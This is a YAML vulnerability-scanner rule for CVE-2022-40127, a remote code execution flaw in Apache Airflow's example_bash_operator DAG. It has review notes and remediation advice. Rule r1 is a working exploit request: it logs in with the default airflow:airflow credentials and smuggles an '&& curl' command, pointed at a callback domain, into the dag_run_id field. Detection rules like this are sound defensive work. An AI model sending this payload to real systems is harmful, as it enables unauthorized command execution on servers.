apache-airflow-cve-2022-40127.yml
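# Scanner rule for CVE-2022-40127 (Apache Airflow, example_bash_operator DAG).
# The rule reports a hit when either r0 or r1 matches (see the top-level expression).
# Remediation for a confirmed hit: upgrade Airflow to a release that fixes this CVE, disable the
# example DAGs (`load_examples = False`), and replace any default API/UI credentials.
name: poc-yaml-apache-airflow-cve-2022-40127
manual: true
transport: http
set:
  # Out-of-band callback endpoint used by r1 to confirm execution.
  reverse: newReverse()
  reverseDomain: reverse.domain
  # NOTE(review): if timeConvert takes a Go reference layout, "3" and "4" are the non-padded
  # 12-hour hour and minute, so the value is not a zero-padded 24-hour ISO 8601 timestamp
  # ("15:04" would be). Confirm against the scanner's documentation.
  time: timeConvert(int(now()), "2006-01-02T3:4:05")
rules:
  # Airflow 1.x: execution takes close to two minutes, so command-execution verification is not
  # practical here and manual testing is required.
  # NOTE(review): r0 only shows that the 1.x admin UI is reachable without authentication and
  # that the example DAG is loaded. It does not exercise the vulnerability, so an r0-only hit
  # should be treated as "needs manual confirmation", not as a confirmed finding.
  r0:
    request:
      cache: true
      method: GET
      path: /admin/dagrun/
    expression: response.status == 200 && response.body.bcontains(b"example_bash_operator")
  # Airflow 2.x: tested directly through the REST API. System time can differ between hosts,
  # so the callback platform may not receive a response.
  # The Authorization header is HTTP Basic for the default airflow:airflow account, so this rule
  # only exercises instances that still accept that default. A miss does not show the target is
  # patched.
  r1:
    request:
      cache: true
      method: POST
      path: /api/v1/dags/example_bash_operator/dagRuns
      headers:
        Content-Type: application/json
        Authorization: Basic YWlyZmxvdzphaXJmbG93
      body: '{ "conf": { "dag_run": "api2" }, "dag_run_id": "id \"&& curl {{reverseDomain}}", "logical_date": "{{time}}.920Z"}'
    # Two alternatives, because && binds tighter than ||:
    #   1. HTTP 200 and the callback arrived within the wait window (execution confirmed), or
    #   2. HTTP 200 and the response shows the run was queued for example_bash_operator.
    # NOTE(review): the second alternative shows only that the API accepted the run, not that
    # the callback fired. It is weaker evidence and should be verified before reporting.
    expression: >-
      response.status == 200 && reverse.wait(5) || response.status == 200 && response.body.bcontains(b"\"dag_id\": \"example_bash_operator\"") && response.body.bcontains(b"\"state\": \"queued\"")
expression: r0() || r1()
detail:
  author: Rainmaker(https://github.com/SevenC-base)
  links:
    - https://mrxn.net/jswz/701.html
  description: apache-airflow-cve-2022-40127 RCE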